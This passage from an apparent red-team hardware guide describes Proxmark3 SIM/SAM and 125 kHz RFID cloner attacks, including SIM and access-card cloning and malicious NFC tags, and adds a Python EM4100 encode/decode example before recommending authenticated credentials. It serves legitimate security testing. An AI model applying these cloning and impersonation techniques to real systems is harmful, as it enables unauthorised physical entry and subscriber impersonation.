  7. Protocol analysis: Analyze RFID protocols to identify weaknesses in implementations.

  8. Brute-force attacks: Iterate key dictionaries against MIFARE sectors, or walk sequential card numbers against a reader to find valid credentials.

  9. Evidence for the report: Produce working clones under controlled conditions to demonstrate the weakness to the client.

SIM/SAM extension for Proxmark3 RDV4

The Proxmark3 RDV4 SIM/SAM extension adds ISO 7816 smart-card slots to the Proxmark3 RDV4, for SIM cards and Secure Access Modules (SAMs). It lets researchers and pentesters read, analyze and, where the card permits it, program card data. SIM cloning is possible only for SIMs that still use the broken COMP128v1 authentication algorithm; modern SIMs use MILENAGE or TUAK, for which no practical key-recovery attack is known, so this capability mainly matters for legacy telecom and access-control deployments.

Attack scenario:

With this module, red teams can extract information such as the IMSI, test for weak authentication algorithms and, on legacy COMP128v1 SIMs, recover the Ki and clone the card, leading to unauthorized access to cellular networks or SAM-backed access control systems.

List of red team attacks

  1. Data extraction: Read the IMSI (International Mobile Subscriber Identity), ICCID, contacts and SMS stored on a SIM.

  2. SIM cloning: Clone legacy SIM cards to impersonate subscribers on the cellular network; infeasible against SIMs using MILENAGE or TUAK.

  3. PIN handling: Test PIN and PUK handling (retry counters, weak defaults) on test cards; a SIM permanently locks once the PUK retry limit is exhausted.

  4. Bypass authentication: Use extracted credentials to bypass authentication mechanisms and access protected systems.

  5. Man-in-the-middle on the card interface: Capture and replay the ISO 7816 APDUs exchanged between a handset or reader and the card to study or manipulate the protocol.

  6. SIM Toolkit (STK) exploitation: Exploit weaknesses in SIM Toolkit applications to trigger actions on behalf of the user without their knowledge.

  7. Secure element analysis: Examine SAMs used in access control systems for weaknesses or backdoor access.

  8. Cryptographic attacks: Recover the Ki from COMP128v1 SIMs with chosen-challenge attacks; not applicable to MILENAGE or TUAK.

  9. Forensic analysis: Recover deleted or hidden data from SIM cards in investigations.

125 kHz RFID Cloner / 13.56 MHz RFID/NFC Reader/Writer

This handheld device clones 125 kHz RFID cards and reads and writes 13.56 MHz NFC tags. It copies EM4100, HID Prox and AWID cards onto writable T5577 tags; all of these broadcast a static, unencrypted ID and can therefore be duplicated in seconds. It works standalone without a computer, gives LED and buzzer feedback, and is simple to use.

Attack scenario:

Red teams use this device to clone access cards for unauthorized entry, or to program NFC tags with malicious content such as phishing URLs. Its portability makes it easy to use in covert operations.

List of red team attacks

  1. RFID card cloning: Clone EM4100, HID Prox and AWID cards to gain unauthorized access to buildings or facilities.

  2. Access control bypass: Use cloned cards to pass physical access controls and enter restricted areas.

  3. Tampering with NFC tags: Write malicious NDEF records (URLs, app links) into NFC tags to target NFC-enabled devices. Modern phones prompt the user before opening a URL or installing anything, so this is a phishing vector rather than an exploit.

  4. Impersonation attacks: Use cloned cards to act as authorized personnel.

  5. Physical security testing: Assess RFID-based access systems by testing whether cloned credentials are accepted.

  6. Social engineering: Use cloned credentials to gain trust or access under false pretenses.

  7. Malicious NFC content: Use NFC tags to deliver links to malware or malicious scripts to devices that scan them, subject to the same user-prompt caveat as item 3.

  8. Covert tagging: Attach NFC tags to objects to track their movement through NFC-enabled checkpoints.

  9. Data exfiltration: Hide stolen data on NFC tags for later retrieval, or pass sensitive information over NFC.
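
Every 125 kHz cloning item on this page (here, for the Proxmark3 and for the Flipper Zero) works for the same reason: an EM4100-class card simply broadcasts a fixed 64-bit pattern. The block below is an added example, not code from the article, a cloner or the Proxmark3 firmware; it encodes a made-up tag ID into the EM4100 frame, Manchester-modulates it, and decodes it back from a read that starts mid-frame, checking the row and column parity the format carries. The names and the Manchester convention are my choices.

```python
"""EM4100 (125 kHz) tag format: encode, Manchester-modulate, and decode with parity checks.

Added example, not code from the article or from any cloner or Proxmark3
firmware. The tag ID is a made-up value. A cloner reads exactly this 64-bit
pattern off the card and writes it to a T5577, which then replays it forever.
"""

HEADER = [1] * 9  # nine 1s; the parity rules guarantee no other run of nine 1s in the stream


def em4100_encode(tag_id_hex):
    """40-bit ID (10 hex digits) -> 64 bits: header, 10 rows of nibble + even parity, 4 column parities, stop 0."""
    if len(tag_id_hex) != 10:
        raise ValueError("EM4100 ID is 40 bits = 10 hex digits")
    bits = list(HEADER)
    columns = [0, 0, 0, 0]
    for c in tag_id_hex:
        nibble = int(c, 16)
        row = [(nibble >> 3) & 1, (nibble >> 2) & 1, (nibble >> 1) & 1, nibble & 1]
        bits += row + [sum(row) % 2]
        columns = [col ^ b for col, b in zip(columns, row)]
    return bits + columns + [0]


def em4100_decode(stream):
    """Locate the header in a circular bit stream (a read may start mid-frame), verify parity, return the ID."""
    n = len(stream)
    for offset in range(n):
        frame = [stream[(offset + i) % n] for i in range(64)]
        if frame[:9] != HEADER:
            continue
        rows = [frame[9 + 5 * r: 14 + 5 * r] for r in range(10)]
        rows_ok = all(sum(row) % 2 == 0 for row in rows)
        cols_ok = all((sum(row[c] for row in rows) + frame[59 + c]) % 2 == 0 for c in range(4))
        if rows_ok and cols_ok and frame[63] == 0:
            return "".join(f"{(row[0] << 3) | (row[1] << 2) | (row[2] << 1) | row[3]:X}" for row in rows)
    return None


def manchester_encode(bits):
    """One common convention: 1 -> [1, 0], 0 -> [0, 1]; the T5577 is configured to emit this."""
    out = []
    for b in bits:
        out += [1, 0] if b else [0, 1]
    return out


def manchester_decode(symbols):
    """Inverse of manchester_encode; assumes the symbol stream is pair-aligned."""
    return [1 if symbols[i] == 1 else 0 for i in range(0, len(symbols), 2)]


def demo():
    tag = "1D00A1B2C3"  # made-up ID: 8-bit version/customer byte + 32-bit number
    frame = em4100_encode(tag)
    rotated = frame[17:] + frame[:17]            # the reader started listening mid-frame
    over_the_air = manchester_encode(rotated)
    recovered = em4100_decode(manchester_decode(over_the_air))
    damaged = frame[:]
    damaged[20] ^= 1                             # one bit error: row parity catches it
    return {"recovered": recovered, "damaged": em4100_decode(damaged)}


if __name__ == "__main__":
    print(demo())
```

Nothing in that frame is secret or challenge-dependent, which is why a handheld cloner needs no computer and a T5577 blank configured for Manchester at RF/64 is an exact replacement. The practical recommendation for a client still on EM4100 or HID Prox is to migrate to credentials with mutual authentication (DESFire EV2/EV3, iClass SE/SEOS) rather than to tune the reader.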
